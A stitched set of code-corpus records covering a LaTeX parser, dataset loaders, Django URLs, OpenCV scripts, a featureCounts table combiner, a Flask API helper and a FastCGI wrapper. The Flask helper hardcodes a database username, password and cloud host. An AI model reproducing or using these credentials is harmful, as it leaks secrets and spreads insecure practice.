for node_id, node in self.nodes.node_classes.items():\n if node.checkable:\n matches = node.check_latex(latex, self.nodes)\n for match in matches:\n node_match = NodeMatch(node=node, match=match)\n node_matches.append(node_match)\n\n last_match_index = 0\n\n if len(node_matches) > 0:\n # Sort in the order of match appearance first.\n node_matches.sort(key=lambda x: x.match.outer_start_index)\n\n stack = []\n for node_match in node_matches:\n # If the stack is populated, keep popping off items until the current node ends within the\n # bounds of the node at the top of the stack.\n while len(stack) > 0 and node_match.match.inner_end_index > stack[-1].match.inner_end_index:\n remaining_text_start_idx = max(last_match_index, stack[-1].match.inner_start_index)\n remaining_text = latex[remaining_text_start_idx:stack[-1].match.inner_end_index]\n if text_node_class.validate_content(remaining_text):\n text_node = text_node_class(content=remaining_text)\n stack[-1].node.add_child(text_node)\n last_match_index = stack[-1].match.outer_end_index\n stack.pop()\n\n # Only process this match if the stack is empty OR that the parent is allowed children\n # and the node isn't before the parent (top of stack).\n if (len(stack) == 0 or (\n stack[-1].node.allowed_children and\n node_match.match.inner_start_index > stack[-1].match.inner_start_index)):\n\n # Create the node.\n current_node = node_match.node()\n\n # Check the node for arguments and their validity.\n # If valid arguments exists, create an Argument node and make a\n # recursive call to this function.\n for argument in node_match.match.arguments:\n if current_node.validate_arguments(argument):\n argument_children = self.parse_latex(argument)\n if len(argument_children) > 0:\n argument_node_class = self.nodes.get_class(self.nodes.argument_node_id)\n argument_node = argument_node_class()\n argument_node.add_children(argument_children)\n current_node.add_child(argument_node)\n\n # If we have jumped over some text, add it to a Text node. And make it a child.\n previous_text = latex[last_match_index:node_match.match.outer_start_index]\n if text_node_class.validate_content(previous_text):\n text_node = text_node_class(content=previous_text)\n if len(stack) > 0:\n stack[-1].node.add_child(text_node)\n else:\n children.append(text_node)\n\n # If the stack isn't empty, make 'current_node' a child of the node on the top of the stack.\n # If the stack is empty, append 'current_node' to the children's list.\n if len(stack) > 0:\n stack[-1].node.add_child(current_node)\n else:\n children.append(current_node)\n\n last_match_index = node_match.match.inner_start_index\n\n # Push the 'current_node' and node_match.match onto the stack.\n node_instance_match = NodeMatch(node=current_node, match=node_match.match)\n stack.append(node_instance_match)\n\n # Get any remaining after text.\n while len(stack) > 0:\n after_text_start_idx = max(last_match_index, stack[-1].match.inner_start_index)\n after_text = latex[after_text_start_idx:stack[-1].match.inner_end_index]\n if text_node_class.validate_content(after_text):\n text_node = text_node_class(content=after_text)\n stack[-1].node.add_child(text_node)\n\n last_match_index = stack[-1].match.outer_end_index + 1\n stack.pop()\n\n # Get any remaining text.\n final_text = latex[last_match_index:len(latex)]\n if text_node_class.validate_content(final_text):\n text_node = text_node_class(content=final_text)\n children.append(text_node)\n\n return children\n","sub_path":"achive/UI/CAMEL 2/src/latexbook/latexparser/texbookparser.py","file_name":"texbookparser.py","file_ext":"py","file_size_in_byte":12846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"458131326","text":"# -*- coding: utf-8 -*-\n# @Desc :\n# @license : Copyright(C), CBR\n# @Contact : shiliang@chinaratings.com.cn\n# @Site :\nimport webbrowser\nclass Movie():\n \"\"\"this class provide a way to store movie related information\"\"\"\n VALID_RATINGS = [\"G\", \"PG\", \"PG-13\", \"R\"]\n\n def __init__(self, movie_title, movie_storyline, poster_image, trailer_youtube):\n self.title = movie_title\n self.storyline = movie_storyline\n self.poster_image_url = poster_image\n self.trailer_youtube_url = trailer_youtube\n\n def show_trailer(self):\n webbrowser.open(self.trailer_youtube_url)\n","sub_path":"pystudy.twilio/media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"269833535","text":"import argparse\nimport numpy as np\nimport pickle\n\nimport cv2\nfrom sklearn.datasets import fetch_openml\nfrom utils.dataset_loader import Dataset\n\nclass MNISTDataset(Dataset):\n def __init__(self, config):\n super().__init__(config)\n self._data_folder_path = config[\"path\"]\n\n self._load_dataset()\n\n\n def _load_dataset(self):\n\n mnist = fetch_openml(self._data_folder_path, version=1,)\n self._images = mnist.data.astype(np.float32)\n self._images /= 255 \n self._labels = mnist.target.astype(np.int32)\n \n self._train_images, self._test_images = np.split(self._images, [len(self._images)-self._test_data_num])\n self._train_labels, self._test_labels = np.split(self._labels, [len(self._labels)-self._test_data_num])\n\n self._train_images = self._train_images.reshape((len(self._train_images), self._image_height, self._image_width, self._image_channel)) # (N, height, width, channel)\n self._test_images = self._test_images.reshape((len(self._test_images), self._image_height, self._image_width, self._image_channel))\n\n self._train_labels = np.eye(np.max(self._train_labels)+1)[self._train_labels]\n self._test_labels = np.eye(np.max(self._test_labels)+1)[self._test_labels]","sub_path":"scripts/utils/mnist_dataset_loader.py","file_name":"mnist_dataset_loader.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"443502130","text":"from django.urls import path\nfrom . import views,calendar_views\nfrom agri.views import PlanListView\n\n\"\"\"192.168.98.195:90/の持つページ一覧\"\"\"\napp_name=\"agri\"\nurlpatterns = [\n path('signup/', views.signup, name=\"signup\"),#アカウント作成\n path('login/', views.Login.as_view(), name='login'),#ログイン\n path('', views.Logout.as_view(), name='logout'),#ログアウト\n path('register', views.register, name='create_crops'),#品目登録画面。ダイアログに移行\n path('update_crops/<int:pk>', views.UpdateCropsView.as_view(), name='update_crops'),\n path('detail/<int:pk>',views.ReadView.as_view(), name='read_crops'),\n path('top', PlanListView.as_view(), name=\"top\"),#トップページ\n path('top2', views.top2, name=\"top2\"),#旧トップページ。使用しない\n path('top3', PlanListView.as_view(), name=\"top3\"),#テストページ。ボタン「あなたの畑」を表示\n # path('top4', views.top4, name=\"top4\"),#googleカレンダー。使用しない\n path('step/<int:pk>/', views.step_register, name=\"step\"),#生産工程登録画面。ダイアログに移行\n path('step_result/<int:pk>/', views.step_result, name=\"step_result\"),#生産工程実績登録画面。ダイアログに移行\n # path('pest_register/<int:pk>/', views.pest_register, name=\"pest_register\"),\n path('pest/<int:pk>/', views.pest_register, name=\"pest\"),#農薬登録画面。ダイアログに移行\n path('pest_result/<int:pk>/', views.pest_result, name=\"pest_result\"),#農薬実績登録画面。ダイアログに移行\n path('ferti/<int:pk>/', views.ferti_register, name=\"ferti\"),#肥料登録画面。ダイアログに移行\n path('ferti_result/<int:pk>/', views.ferti_result, name=\"ferti_result\"),#肥料実績登録画面。ダイアログに移行\n\n # calendar #pythonで記述されたカレンダー。こちらを参考に作成していく予定\n path('month/', calendar_views.MonthCalendar.as_view(), name='month'),\n path('month/<int:year>/<int:month>/', calendar_views.MonthCalendar.as_view(), name='month'),\n path('week/', calendar_views.WeekCalendar.as_view(), name='week'),\n path('week/<int:year>/<int:month>/<int:day>/', calendar_views.WeekCalendar.as_view(), name='week'),\n path('week_with_schedule/', calendar_views.WeekWithScheduleCalendar.as_view(), name='week_with_schedule'),\n path(\n 'week_with_schedule/<int:year>/<int:month>/<int:day>/',\n calendar_views.WeekWithScheduleCalendar.as_view(),\n name='week_with_schedule'\n ),\n path(\n 'month_with_schedule/',\n calendar_views.MonthWithScheduleCalendar.as_view(), name='month_with_schedule'\n ),\n path(\n 'month_with_schedule/<int:year>/<int:month>/',\n calendar_views.MonthWithScheduleCalendar.as_view(), name='month_with_schedule'\n ),\n path('mycalendar/', calendar_views.MyCalendar.as_view(), name='mycalendar'),\n path(\n 'mycalendar/<int:year>/<int:month>/<int:day>/', calendar_views.MyCalendar.as_view(), name='mycalendar'\n ),\n path(\n 'month_with_forms/',\n calendar_views.MonthWithFormsCalendar.as_view(), name='month_with_forms'\n ),\n path(\n 'month_with_forms/<int:year>/<int:month>/',\n calendar_views.MonthWithFormsCalendar.as_view(), name='month_with_forms'\n ),\n]","sub_path":"agri/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"298113811","text":"import os\nimport random\n\nfrom labels import labels, numeric_labels, get_small_label_name\n\n\nPATH = '~/localCode/caffe/train_data_caffe.txt'\n\nwith open(os.path.expanduser(PATH)) as f:\n data = f.readlines()\n\nnew_data = []\n\nfor line in data:\n name, short_label = line.split()\n new_label = random.choice(labels[get_small_label_name(short_label)])\n new_data.append('%s %s\\n' % (name, new_label))\n\nwith open(os.path.expanduser('~/localCode/caffe/new_train_data_caffe.txt'), 'w') as f:\n for line in new_data:\n f.write(line)\n\n","sub_path":"convert_labels_101toimgnet.py","file_name":"convert_labels_101toimgnet.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"252013745","text":"# Given a binary tree, return the sum of values of nodes with even-valued grandparent.  (A grandparent of a node is the parent of its parent, if it exists.)\r\n#\n# If there are no nodes with an even-valued grandparent, return 0.\r\n#\n#  \r\n# Example 1:\r\n#\n#\n#\n#\n# Input: root = [6,7,8,2,7,1,3,9,null,1,4,null,null,null,5]\r\n# Output: 18\r\n# Explanation: The red nodes are the nodes with even-value grandparent while the blue nodes are the even-value grandparents.\r\n#\n#\n#  \r\n# Constraints:\r\n#\n#\n# \tThe number of nodes in the tree is between 1 and 10^4.\r\n# \tThe value of nodes is between 1 and 100.\r\n#\n\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # def __init__(self):\n # self.total = 0\n\n def sumEvenGrandparent(self, root: TreeNode) -> int:\n # 我的反思: 没有想到存祖父节点的值\n # 虽然Ac了 但是方法比较笨\n # BFS\n # if root.val % 2 == 0:\n # if root.left:\n # if root.left.left:\n # self.total += root.left.left.val\n # if root.left.right:\n # self.total += root.left.right.val\n # self.sumEvenGrandparent(root.left)\n # if root.right:\n # if root.right.left:\n # self.total += root.right.left.val\n # if root.right.right:\n # self.total += root.right.right.val\n # self.sumEvenGrandparent(root.right)\n # else:\n # if root.left:\n # self.sumEvenGrandparent(root.left)\n # if root.right:\n # self.sumEvenGrandparent(root.right)\n # return self.total \n\n # DFS 参考官方 (最佳方法)\n # total = 0\n # def dfs(grandparent, parent, node):\n # if node is None:\n # return\n # if grandparent % 2 == 0:\n # nonlocal total\n # total += node.val\n # dfs(parent, node.val, node.left)\n # dfs(parent, node.val, node.right)\n \n # dfs(1, 1, root)\n # return total\n\n # BFS 参考官方(跟我的思路类似)\n q = collections.deque([root])\n total = 0\n while q:\n root = q.popleft()\n if root.val % 2 == 0:\n if root.left:\n if root.left.left:\n total += root.left.left.val\n if root.left.right:\n total += root.left.right.val\n if root.right:\n if root.right.left:\n total += root.right.left.val\n if root.right.right:\n total += root.right.right.val\n if root.left:\n q.append(root.left)\n if root.right:\n q.append(root.right)\n \n return total\n","sub_path":"solutions/1243-sum-of-nodes-with-even-valued-grandparent/sum-of-nodes-with-even-valued-grandparent.py","file_name":"sum-of-nodes-with-even-valued-grandparent.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"231133360","text":"import cv2\nimport sys\nimport time\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 3:\n print(__doc__)\n sys.exit(1)\n \n cv2.setUseOptimized(True)\n cv2.setNumThreads(4)\n\n image = cv2.imread(sys.argv[1])\n\n new_height = 400\n new_width = int(image.shape[1]*new_height/image.shape[0])\n image = cv2.resize(image,(new_width, new_height))\n\n ss = cv2.ximgproc.segmentation.createSelectiveSearchSegmentation()\n ss.setBaseImage(image)\n\n start_time = time.time()\n if(sys.argv[2] == 'f'):\n ss.switchToSelectiveSearchFast()\n print(\"Model Fast\")\n elif(sys.argv[2] == 'q'):\n ss.switchToSelectiveSearchQuality()\n print(\"model Quality\")\n else: \n print(__doc__)\n sys.exit(1)\n\n rects = ss.process()\n print(\"Total number of region proposal: \"+str(len(rects)))\n number_show_region = 100\n increment = 50\n\n while True:\n image_out = image.copy()\n\n for i, rect in enumerate(rects):\n if (i < number_show_region):\n x, y, w, h = rect\n # print(rect)\n cv2.rectangle(image_out, (x, y), (x+w, y+h), (0, 255, 0), 1, cv2.LINE_AA)\n else:\n break\n\n end_time = time.time()\n cv2.imshow(\"output\",image_out)\n print(\"Time process: \" + str(end_time - start_time))\n k = cv2.waitKey(0) & 0xFF\n\n if k == 109: # press l\n number_show_region += increment\n elif k == 108: # press m\n number_show_region -= increment\n elif k == 113:\n break\n cv2.destroyAllWindows()","sub_path":"Learn-Tensorflow/r-cnn/selective_search.py","file_name":"selective_search.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"627996559","text":"#!/usr/bin/env python3\n# https://github.com/rnnh/bioinfo-notebook.git\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 18 12:08:41 2020\n\n@author: ronan\n\nThis script creates a single CSV feature count table from the featureCounts\noutput tables in the target directory.\n\nThis combined feature count table can be used for differential expression\nanalysis (e.g. using DESeq2 or edgeR in R).\n\"\"\"\n\n# Loading required libraries\nfrom time import gmtime, strftime\nimport pandas as pd\nimport argparse\nimport sys\nimport os\n\n# Parsing command line arguments\nparser = argparse.ArgumentParser(\n description = \"Combines the featureCounts output tables in the target \\\n directory.\")\n\n# -d PATH -o CUSTOM_FILENAME\nparser.add_argument(\"-d\", \"--directory\", dest = \"path\",\n help = \"path to target directory. \\\n Default: current directory\")\nparser.add_argument(\"-o\", \"--output\", dest =\"custom_filename\",\n help = \"output filename.\\\n Default: featCounts_{species}_{date}.csv\")\n\nargs = parser.parse_args()\n\n# Changing to the target directory\nif args.path is not None:\n path = args.path\nelse:\n path = os.getcwd()\nos.chdir(path)\n\n# Creating variables\nfixed_headers = [\"Geneid\", \"Chromosome\", \"Start\", \"End\", \"Strand\", \"Length\"]\ntarget_file_prefix = \"feature_counts_\"\ndate = strftime(\"%Y%m%d\", gmtime())\ncounts_table = pd.DataFrame()\noutput_filename = str()\ntarget_file_count = 0\nspecies_name = str()\nsrr = str()\n\n# Iterating through files in target directory, combining feature counts\n# into one DataFrame object (\"counts_table\")\nfor filename in os.listdir():\n if filename.startswith(target_file_prefix):\n target_file_count = target_file_count + 1\n filename_list = filename.split(\"_\")\n srr = filename_list[2]\n species_name = filename_list[3] + \"_\" + filename_list[4]\n featCounts_df = pd.read_csv(filename, sep = \"\\t\",\n lineterminator = '\\n', skiprows = 1,\n header = 0)\n featCounts_headers = fixed_headers.copy()\n featCounts_headers += [srr]\n featCounts_df.columns = featCounts_headers\n gene_ids = featCounts_df[\"Geneid\"]\n counts = featCounts_df[srr]\n # Add the gene IDs and counts to the counts_table DataFrame as columns\n # if it's empty; otherwise add the counts only\n if counts_table.empty:\n counts_table = pd.concat([gene_ids, counts], axis = 1,\n sort = False)\n else:\n counts_table = pd.concat([counts_table, counts], axis = 1,\n sort = False)\n del featCounts_headers\n\nif target_file_count == 0:\n # Exiting script if there are no target files in the target directory\n print(\"ERROR: There are no featureCount files in the target directory. \\n\")\n parser.print_help(sys.stderr)\n exit\nelse:\n # Exporting counts_table DataFrame as a CSV file\n if args.custom_filename is not None:\n output_filename = args.custom_filename\n else:\n output_filename = \"featCounts_\" + species_name + \"_\" + date + \".csv\"\n counts_table.to_csv(output_filename, index = False)\n","sub_path":"scripts/combining_featCount_tables.py","file_name":"combining_featCount_tables.py","file_ext":"py","file_size_in_byte":3234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"449041764","text":"import sys\nimport numpy as np\nimport cv2\n\n\n# load digit\nsrc = cv2.imread(\"image/digits_print.bmp\",cv2.IMREAD_GRAYSCALE)\ndigits = []\nfor i in range(10) :\n root = \"image/digits/digit{}.bmp\"\n digits.append(cv2.imread(root.format(i),cv2.IMREAD_GRAYSCALE))\n\n if digits[i] is None :\n print(\"Image load failed\")\n sys.exit()\n\nif src is None :\n print(\"Image load failed\")\n sys.exit()\n\n\n_,src_bin = cv2.threshold(src, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)\nsrc_contours,_ = cv2.findContours(src_bin, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n\ndst = cv2.cvtColor(src,cv2.COLOR_GRAY2RGB)\nfor pts in src_contours :\n if cv2.contourArea(pts) < 1000 : continue\n\n x,y,w,h = cv2.boundingRect(pts)\n \n crap = src[y:y+h, x:x+w]\n\n crap = cv2.resize(crap,(100,150))\n res = []\n for digit in digits :\n res.append(cv2.matchTemplate(crap, digit, cv2.TM_CCOEFF_NORMED))\n\n n = np.argmax(res)\n cv2.putText(dst, str(n), (x,y-3), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (255,0,0),2,cv2.LINE_AA)\n cv2.rectangle(dst,(x,y,w,h),(255,0,0),1)\n\n\ncv2.imshow('src',src)\ncv2.imshow('dst',dst)\ncv2.waitKey()\ncv2.destroyAllWindows()","sub_path":"07.영상분할과객체검출/3_2.digitrec.py","file_name":"3_2.digitrec.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"264813296","text":"from flask import request\nfrom flask_restful import Resource\nfrom functools import wraps\nimport requests\n\n\n__all__ = [\"SlaveHandler\"]\n\nSTATUS_CODES = {\n\t200: \"Ok\",\n\t201: \"Create\",\n\t202: \"Accept\",\n\t203: \"Non-Authoritative Information\",\n\t204: \"No Content\",\n\t400: \"Bad Request\",\n\t401: \"Unauthorized\",\n\t403: \"Forbidden\",\n\t404: \"Not Found\",\n\t405: \"Method Not Allowed\",\n\t409: \"Conflict\",\n\t422: \"Unprocessable Entity\",\n\t500: \"Internal Server Error\",\n\t408: \"Request Timeout\",\n\t406: \"Not Acceptable\",\n\t409: \"Conflict\",\n\t410: \"Gone\",\n\t413: \"Request Entity Too Large\",\n\t414: \"Request URI Too Large\",\n\t417: \"Expectation Failed\",\n\t429: \"TooManyRequests\",\n\t503: \"Service Unavailable\"}\n\nURLS = {\n\t\"DEV\": {\n\t\t\"rates\": \"http://dev.clever-api-rates.local\",\n\t\t\"auth\": \"http://auth-api-qa.clever.palace-resorts.local\",\n\t\t\"secrets\": \"http://missecretosmasoscuros-dev.local\",\n\t\t\"logs\": \"http://mislogs-dev.local\"},\n\t\"QA\": {\n\t\t\"rates\": \"http://rates-api-qa.clever.palace-resorts.local\",\n\t\t\"auth\": \"http://auth-api-qa.clever.palace-resorts.local\",\n\t\t\"secrets\": \"http://missecretosmasoscuros-qa.local\",\n\t\t\"logs\": \"http://mislogs-qa.local\"},\n\t\"PRO\": {\n\t\t\"rates\": \"http://rates-api.clever.palace-resorts.local\",\n\t\t\"auth\": \"http://clever.auth-api.palace-resorts.local\",\n\t\t\"secrets\": \"http://missecretosmasoscuros-pro.local\",\n\t\t\"logs\": \"http://mislogs-pro.local\"}}\n\n\nclass SlaveHandler:\n\n\tdef __init__(self, app=None):\n\t\tself.__CONFIG = app.config\n\n\t@property\n\tdef environment(self):\n\t\treturn self.app_config(\"APP_ENV\")\n\n\t@property\n\tdef system_id(self):\n\t\treturn self.app_config(\"SYSTEM_ID\")\n\n\t# Decorator to validate Bearer Token in request.\n\tdef access_middleware(self, func):\n\t\t@wraps(func)\n\t\tdef wrapper(*args, **kwargs):\n\t\t\tif 'Authorization' not in request.headers:\n\t\t\t\treturn self.build_error_response(400, \"EMPTY TOKEN OR NOT RECEIVED\")\n\t\t\telse:\n\t\t\t\t# Request auth to validate token\n\t\t\t\ttry:\n\t\t\t\t\tresource = 'Flask%s' % request.endpoint\n\t\t\t\t\tmethod = request.method.lower()\n\t\t\t\t\turl = self.get_url('auth')\n\t\t\t\t\tsystem_id = self.system_id\n\t\t\t\t\tauth_url = \"%s/acl/acl/%s/%s/%s\" % (url, resource, method, system_id)\n\t\t\t\t\tresponse = self.request(url=auth_url)\n\t\t\t\t\tif response['allowed_access'] is False:\n\t\t\t\t\t\treturn self.build_error_response(403, response['message'])\n\t\t\t\texcept Exception as e:\n\t\t\t\t\treturn self.build_error_response(401, \"BAD TOKEN GET A NEW ONE\")\n\t\t\t\t# Execute resource function\n\t\t\t\ttry:\n\t\t\t\t\treturn func(*args, **kwargs)\n\t\t\t\texcept Exception as e:\n\t\t\t\t\treturn self.build_error_response(500, \"Something went wrong!\")\n\t\treturn wrapper\n\n\tdef decode_base64(self):\n\t\tpass\n\n\tdef app_config(self, key):\n\t\t\"\"\" Returns Flask.config global variables \"\"\"\n\t\treturn self.__CONFIG.get(key, \"\")\n\n\tdef build_error_response(self, status=500, return_code=True):\n\t\tresponse = {\n\t\t\t\"success\": False,\n\t\t\t\"status\": status,\n\t\t\t\"message\": [STATUS_CODES.get(status, \"Error\")],\n\t\t\t\"data\": []\n\t\t}\n\t\tif return_code:\n\t\t\treturn response, status\n\t\treturn response\n\n\tdef request(\n\t\tself, url=\"\", method=\"get\", data={},\n\t\tcontent_type=\"application/json\", auth=True, timeout=15):\n\t\t\"\"\"Make HTTP GET/POST/PUT requests\"\"\"\n\n\t\ttry:\n\t\t\theaders = {}\n\t\t\tif not auth:\n\t\t\t\theaders = {\"Authorization\": request.headers[\"Authorization\"]}\n\t\t\tif content_type == \"application/json\":\n\t\t\t\tdata = json.dumps(data)\n\t\t\theaders[\"content-type\"] = content_type\n\t\t\tresponse = None\n\t\t\tif method == \"post\":\n\t\t\t\tresponse = requests.post(url, data=data, headers=headers)\n\t\t\telif method == \"put\":\n\t\t\t\tresponse = requests.put(url, data=data, headers=headers)\n\t\t\telse:\n\t\t\t\tresponse = requests.get(url, headers=headers)\n\t\t\tif content_type == \"application/json\":\n\t\t\t\tresponse = json.loads(response.text)\n\t\t\treturn response\n\t\texcept Timeout as e:\n\t\t\treturn self.build_error_response(408)\n\t\texcept Exception as e:\n\t\t\treturn self.build_error_response(500)\n\n\tdef get_url(self, module):\n\t\t\"\"\" Gets API urls \"\"\"\n\n\t\turl = URLS.get(self.environment, \"DEV\").get(module, \"\")\n\t\treturn url\n\n\tdef get_db_uri(self):\n\t\t\"\"\" Retrieves database secret from AWS \"\"\"\n\n\t\tdbapi = self.app_config(\"SQLALCHEMY_DBAPI\")\n\t\tdatabase = self.app_config(\"SQLALCHEMY_DATABASE\")\n\t\tparams = self.app_config(\"SQLALCHEMY_PARAMS\")\n\n\t\tif type(params) is dict:\n\t\t\tparams = \"?%s\" % \"\".join(\n\t\t\t\t[\"&%s=%s\" % (key, value) for (key, value) in params.items()])\n\n\t\tusername = \"clv-rates-adm\"\n\t\tpassword = \"fk+ZrP3)8TSeb\"\n\t\thost = \"mysqldev57-cluster.cluster-cdrfidjuoewu.us-east-1.rds.amazonaws.com\"\n\t\tdb_uri = \"{dbapi}://{username}:{password}@{host}/{database}{params}\".format(\n\t\t\tdbapi=dbapi, username=username, password=password,\n\t\t\thost=host, database=database, params=params)\n\t\treturn db_uri\n\n\tdef save_log(self, message):\n\t\t\"\"\" Saving logs in AWS \"\"\"\n\t\turl = self.get_url(\"logs\")\n\t\tlog_description = \"Saving log in {url}: {message}\"\n\t\tprint(log_description.format(url=url, message=message))\n\n\tdef werkzeug_errors(self):\n\t\t\"\"\" Custom errors for flask_restful \"\"\"\n\n\t\terrors = {\n\t\t\t'NotFound': self.build_error_response(404, return_code=False),\n\t\t\t'Forbidden': self.build_error_response(403, return_code=False),\n\t\t\t'MethodNotAllowed': self.build_error_response(405, return_code=False),\n\t\t\t'InternalServerError': self.build_error_response(500, return_code=False),\n\t\t\t'Unauthorized': self.build_error_response(401, return_code=False),\n\t\t\t'BadRequest': self.build_error_response(400, return_code=False),\n\t\t\t'RequestTimeout': self.build_error_response(408, return_code=False),\n\t\t\t'NotAcceptable': self.build_error_response(406, return_code=False),\n\t\t\t'Conflict': self.build_error_response(409, return_code=False),\n\t\t\t'Gone': self.build_error_response(410, return_code=False),\n\t\t\t'RequestEntityTooLarge': self.build_error_response(413, return_code=False),\n\t\t\t'RequestURITooLarge': self.build_error_response(414, return_code=False),\n\t\t\t'ExpectationFailed': self.build_error_response(417, return_code=False),\n\t\t\t'TooManyRequests': self.build_error_response(429, return_code=False),\n\t\t\t'ServiceUnavailable': self.build_error_response(503, return_code=False),\n\t\t}\n\t\treturn errors\n","sub_path":"code_structure/config/clv_base.py","file_name":"clv_base.py","file_ext":"py","file_size_in_byte":5958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"339171379","text":"import pandas\nimport matplotlib\nmatplotlib.use('Agg')\nimport pylab as plt\nimport numpy as np\nimport sys\n\n\nM = 29\ndef read_data(inF):\n df = pandas.read_table(inF, header=None)\n term = df.ix[0:M, 0][::-1]\n sig = df.ix[0:M, 6][::-1]\n pvalue = df.ix[0:M, 3][::-1]\n return(term, sig, pvalue)\n\ndef get_sig_gene_num(inF):\n df = pandas.read_table(inF, header = 0)\n n = df.shape[0]\n return(n)\n\ndef plot(inF, ouFpre):\n [term, sig, pvalue] = read_data(inF)\n sig_gene_num = get_sig_gene_num(inF.split('-tf-RD')[0] + '.txt')\n\n N = len(term)\n Labels = term\n L2 = sig\n\n xticks = range(1, N + 1)\n xticksTotal = range(0, N + 2)\n fig = plt.figure()\n ax = fig.add_axes([0.15,0.1,0.7,0.8])\n ax.set_xlim(int(max(list(sig))*1.1), 0)\n #ax.set_xticks(range(int(max(sig)) + 1, -1, -1))\n bh2 = ax.barh(xticks, L2, align = 'center', fc='blue', alpha = 0.4, ec='blue')\n ax.set_ylim(0, N + 1)\n ax.set_yticks(xticksTotal)\n ax.set_yticklabels([''] + list(pvalue) + [''], fontsize=10)\n ax.set_ylabel('p value')\n #ax.legend([bh1[1], bh2[1]], ['observed - expected','expected'], ncol = 2, prop={'size':10}, loc = 'upper right', bbox_to_anchor=(1.01, 1.08))\n ax.set_xlabel('Number of binding genes')\n ax.set_title(ouFpre + ', %s significant genes'%sig_gene_num, fontsize=12)\n\n ax2 = ax.twinx()\n ax2.set_yticks(ax.get_yticks())\n ax2.set_yticklabels([''] + list(Labels) + [''], fontsize=10)\n plt.savefig(inF.split('.txt')[0] + '-top%s.pdf'%(M+1))\n plt.grid()\n\n\n \nplot('MHCII_HighLow_Tspan8_PositiveNegative_sig-tf-RD', 'MHCII HighLow, Tspan8 Positive vs Negative')\nplot('MHCII_high_Tspan8_PositiveNegative_sig-tf-RD', 'MHCII High, Tspan8 Positive vs Negative')\nplot('MHCII_low_Tspan8_PositiveNegative_sig-tf-RD', 'MHCII Low, Tspan8 Positive vs Negative')\nplot('Tspan8_negative_MHCII_HighLow_sig-tf-RD', 'Tspan8 Negative, MHCII High vs Low')\nplot('Tspan8_positive_MHCII_HighLow_sig-tf-RD', 'Tspan8 Positive, MHCII High vs Low')\nplot('Tspan8_PositiveNegative_MHCII_HighLow_sig-tf-RD', 'Tspan8 PositiveNegative, MHCII High vs Low')\n","sub_path":"mTECs/14-RNASeq/03-DESeq/Gprofiler/TFplot/02-tf-plot.py","file_name":"02-tf-plot.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"521933393","text":"\"\"\"\nDefines FCGI server\n\"\"\"\n\n# HeadURL\t\t$HeadURL: file:///Z:/backup/svn/webstuff/tags/release20061229_v_1_0_0/webstuff/server/fastcgi_if.py $\n# Author:\t\t$Author: atis $\n# File version:\t$Revision: 59 $\n# Last changes:\t$Date: 2006-07-17 16:44:00 +0300 (Pr, 17 Jūl 2006) $\n\n\nfrom common_if import *\nimport flup.server.fcgi as fcgi\n\n# user main function\nuser_func = None\n\n# server instance\nserverInstance = None\n\ndef _main(environ, start_response):\n\t\"\"\"Wraps user function to work with flup FastCGI.\"\"\"\n\n\tstorage.add_thread()\n\n\ttry:\n\t\t# setup thread storage\n\t\tstorage[\"headers\"] = []\n\t\tstorage[\"response\"] = (200, \"OK\")\n\t\tstorage[\"content\"] = \"\"\n\n\t\t# get and parse query string\n\t\tquery_string = environ.get(\"QUERY_STRING\", \"\")\n\t\tstorage[\"getvars\"] = cgi.parse_qs(query_string, True)\n\n\t\t# store POST\n\t\tinput_file = environ[\"wsgi.input\"]\n\t\tenviron[\"QUERY_STRING\"] = \"\"\n\t\tstorage[\"postvars\"] = cgi.parse(input_file, environ, 1)\n\n\t\t# store cookies\n\t\tcookie_obj = Cookie.SimpleCookie()\n\t\tcookie_obj.load(environ.get(\"HTTP_COOKIE\", \"\"))\n\t\tcookies = {}\n\t\tfor key, morsel in cookie_obj.iteritems():\n\t\t\tcookies[key] = morsel.value\n\t\tstorage[\"cookies\"] = cookies\n\n\t\t# store environment\n\t\tenviron[\"QUERY_STRING\"] = query_string\n\t\tstorage[\"env\"] = environ\n\n\t\t# execute user function\n\t\tuser_func()\n\n\t\t# output response and headers\n\t\tcode, descr = storage[\"response\"]\n\t\theader(\"Content-Length\", str(len(storage[\"content\"])))\n\t\tstart_response(str(code) + ' ' + descr, storage[\"headers\"])\n\n\t\t# get content\n\t\tcontent = storage[\"content\"]\n\tfinally:\n\t\t# clean thread storage\n\t\tstorage.remove_thread()\n\n\treturn [content]\n\n#\n# Below are functions callable by user\n#\n\ndef init(_user_func, ip = \"127.0.0.1\", port = 9777):\n\t\"\"\"Initialize web module.\"\"\"\n\n\tglobal user_func\n\n\tuser_func = _user_func\n\taddr = (ip, port)\n\tglobal serverInstance\n\tserverInstance = fcgi.WSGIServer(_main, bindAddress = addr)\n\t\ndef run():\n\t\"\"\"Listen to requests\"\"\"\n\treturn 